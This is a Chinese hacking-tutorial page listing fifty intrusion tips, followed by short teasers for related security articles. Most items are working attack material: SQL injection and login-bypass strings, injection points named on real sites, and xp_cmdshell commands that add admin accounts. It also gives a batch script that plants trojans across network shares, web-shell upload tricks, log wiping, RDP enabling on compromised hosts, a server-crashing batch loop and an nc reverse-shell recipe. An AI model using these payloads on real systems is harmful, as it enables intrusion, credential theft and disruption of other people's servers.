黑客入侵网络的五十种方法

所属分类: 黑客教程 / 网络安全 阅读数: 844
收藏 0 赞 0 分享
现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。
  1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络  2.搜索栏里输入  关键字%'and 1=1 and '%'='  关键字%'and 1=2 and '%'='  比较不同处 可以作为注入的特征字符  3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是  4.我们先到www.google.com底下搜索一下co net mib ver 1.0  密码帐号都是 'or'='or'  5.挂马代码  6.http://www.wyyfk.com/24小时挂qq工具  7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,  net localgroup administrators还是可以看出guest是管理员来  7.只要敢想,新浪也可入侵 注入点  http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59  微软官方网站注入点  http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=  8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上qq大盗木马  9.有sa权限sqlserver数据库、并且能sql注入支持fso asp的服务器  sql注入后,如何上传木马,  文章地址 http://hack123.home4u.china.com/0601.htm  10.qq强制聊天代码  http://wpa.qq.com/msgrd?v=1&uin=对方的qq号&site=ioshenmue&menu=yes  使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发qq消息。  11. mybbs论坛cookie欺骗 后台备份马  12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等  用法: 安装: instsrv.exe 服务名称 路径  卸载: instsrv.exe 服务名称 remove  13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=风の白衣&password2=01180017&username1=风の白衣&submit=添 加 password2=01180017就是他的登陆密码  14.搜索的技巧 inurl:网址  15.启航工作室wms 5.0网站程序漏洞  在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)  利用动画看http://soft.77169.com/62/20050530/6824.html  16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是asp结尾,所以木马不会变~  17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/  工具下载www.hack6.com  地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面  18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉  不能注入时要第一时间想到\暴库  19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了  工具使用方法动画和所有文件  http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811  20.缺少xp_cmdshell时  尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'  假如恢复不成功,可以尝试直接加用户(针对开3389的)  declare @o int  exec sp_oacreate 'wscript.shell',@o out  exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理员
21.批量种植木马.bat   for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中  for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间  扫描地址.txt里每个主机名一行 用\\开头  22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址www.hack6.com  23.dv7.1用还原数据功能 还原asa木马  24.凡人网络购物系统v6.0 可以\暴库  25.ipb2.0.2漏洞 构造语句  $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb<= 2.0.3论坛注入工具 www.hack6.com有下载  26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间  27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲  28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马  29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路  30.在程序上传shell过程中,程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下: 保存为.asp,程序照样 执行.  31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马  32.喜欢网页挂马的看看这篇总结文章吧  http://77169.com/news/hk/2005060611656.html  33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库  34.iis6 for windows 2003 enterprise edition 如iis发布目录文件夹包含.asp后辍名.  将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.  .cer 等后缀的文件夹下都可以运行任何后缀的asp木马  35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip  然后用#clear logg和#clear line vty *删除日志  36.搜索关键字:"copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多  37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具:bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马  38.学会总结入侵思路http://www.77169.com/news/hk/2005060811688.html  39.电脑坏了省去重新安装系统的方法  纯dos下执行,  xp:copy c:\windows\repair\*.* 到 c:\windows\system32\config  2k: copy c:\winnt\repair\*.* 到 c:\winnt\system32\config  40.一般人设置啊拉qq大盗的时候发信和收信都是同一个信箱,因此当我的机子中了此木马后没有立即杀掉进程,而是用内存编辑工具打开它的进程,查找smtp字样,就会找到它的信箱和密码了。只对1.5以前的管用.  41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的  http://soft.77169.com/62/20050608/6878.html  42.有许多管理员用备份的日期做备份数据库的名字  比如http://www.hack6.com/bbs/databackup/20050601.mdb  43.动网数据库oldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&submit=更 新  不知道用户名(不是葛防) 转化这个用他本身的页面  http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=填写登录信息  填写登录信息这句话意思是“填写登录信息”  那么就把填写登录信息换成叼防 可以看到用户名  44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户
45.解决tcp/ip筛选 在注册表里有三处,分别是:   hkey_local_machine\system\controlset001\services\tcpip  hkey_local_machine\system\controlset002\services\tcpip  hkey_local_machine\system\currentcontrolset\services\tcpip  分别用  regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip  regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip  regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip  命令来导出注册表项  然后把三个文件里的enablesecurityfilters"=dword:00000001,  改成enablesecurityfilters"=dword:00000000 再将以上三个文件分别用  regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 导入注册表即可  46.使chm木马无法在本地运行木马程序 将注册表"hkey_current_u  ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004项的值由原来十进制的0改为十六进制的3。  47.开3389的5种方法  (1)打开记事本,编辑内容如下:  echo [components] > c:\sql  echo tsenable = on >> c:\sql  sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q  编辑好后存为bat文件,上传至肉鸡,执行。  (2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05  下载地址:www.netsill.com/rots.zip  在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:  c:\>cscript rots.vbs <目标ip> <用户名> <密码> [服务端口] [/r]  如果要对本地使用,ip地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用 ""表示)。  (3)djshao正式版5.0  解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:\winnt\temp下,然后 进入c:\winnt\temp目录执行djxyx*.**e解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡 会自动重启!重启后会出现终端服务  (4)下载dameware nt utilities 3.66.0.0 注册版  地址www.netsill.com/dwmrcw36600.zip  安装注册完毕后输入对方ip用户名密码,等待出现是否安装的对话框点是。  复制启动后出现对方桌面。  在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入 后在启动终端服务上打上勾。确定自动提示重起,重起后ok  (5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可  48.qq上得到别人的ip  一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大  当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复  还可以用天网防火墙选择上udp数据保检测,即可拦截到对方ip  49.挂马js代码document.write('');保存到js页面里 可让所有页面挂马  50.让服务器重启  写个bat死循环:  @echo off  :loop1  cls  start cmd.exe  goto loop1保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
更多精彩内容其他人还在看

web,sql分离的一点想法

例子: 1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门. 2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer findpass gethashs... 查看详情
收藏 0 赞 0 分享

嗅探中当机的一点点启示(有问题就重启机器)

很多朋友在嗅探的时候肉猪一不小心就挂了.那个后悔啊..... 当然 你要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用罗. 这样会大大的减少当机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好吧. 如果还是不小心挂了呢. 没事.... 查看详情
收藏 0 赞 0 分享

SYN Flood攻击与防御方法

一、为什么Syn Flood会造成危害      这要从操作系统的TCP/IP协议栈的实现说起。当开放了一个TCP端口后,该端口就处于Listening状态,不停地监视发到该端口的Syn报文,一旦接收到Client发来的Syn报文... 查看详情
收藏 0 赞 0 分享

SYN Flood攻击原理与防护

SYN Flood攻击早在1996年就被发现,但至今仍然显示出强大的生命力。很多操作系统,甚至防火墙、路由器都无法有效地防御这种攻击,而且由于它可以方便地伪造源地址,追查起来非常困难。它的数据包特征通常是,源发送了大量的SYN包,并且缺少三次握手的最后一步握手ACK回复。&nbs... 查看详情
收藏 0 赞 0 分享

LINUX 遭到SYN FLOOD攻击 LINUX下SYN攻防战

LINUX下SYN攻防战如下     (一)SYN攻击原理SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接请求,耗费服务器CPU和内存资源。SYN攻击聊了能影响主机外,还可以危害路由器,防火墙等网络系统,... 查看详情
收藏 0 赞 0 分享

Unix系统NC反弹shell的方法

NC的原生做法:nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /tmp/backpipe p然后管道一边接入shell,一变用NC反弹到攻击者主机x.... 查看详情
收藏 0 赞 0 分享

如何判断电脑是否沦为“肉鸡”?

“肉鸡”在黑客里面的一个专有名词,意思是你的电脑已经完全被黑客所控制,他可以控制你电脑里面的一切资料,甚至是记录你输入的QQ密码,银行密码。同时,他还可以利用你的电脑去攻击其它人的电脑。很多朋友的电脑已经沦为肉鸡,自己还不知道。下面,小编就来给大家盘点几条... 查看详情
收藏 0 赞 0 分享

整人用的一个邪恶电脑重启病毒

在一本很无趣的书上看到一个很有趣的事.当然这个重启病毒相对简单.实际上只是改变了图标而已,你可以在你宿舍同学电脑上试验一下.step1:在桌面新建一个bat文件,输入shutdown /r  ,然后保存即可.step2:选中新建的bat文件创建快捷方式,然后隐藏该bat... 查看详情
收藏 0 赞 0 分享

高效的DDoS攻击探测与分析工具:FastNetMon

关于FastNetMon这是一个基于多种抓包引擎(NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP)的DoS/DDoS攻击高效分析工具,可以探测和分析网络中的异常流量情况,同时可以通过外部脚本通知或阻断攻击。特性可处理入/出口流量如果发现某... 查看详情
收藏 0 赞 0 分享

什么样的密码难破解最安全?表情符号成最安全的密码

互联网生活促成了庞大的账户密码数据,怎样设置自己登陆密码最安全?什么样的密码难破解?据媒体报道表情符号将成最安全的密码。什么样的密码难破解最安全?表情符号成最安全的密码来自英国的安全软件开发公司Intelligent Environments6月15日发布了世界上第一个表情密码系... 查看详情
收藏 0 赞 0 分享
查看更多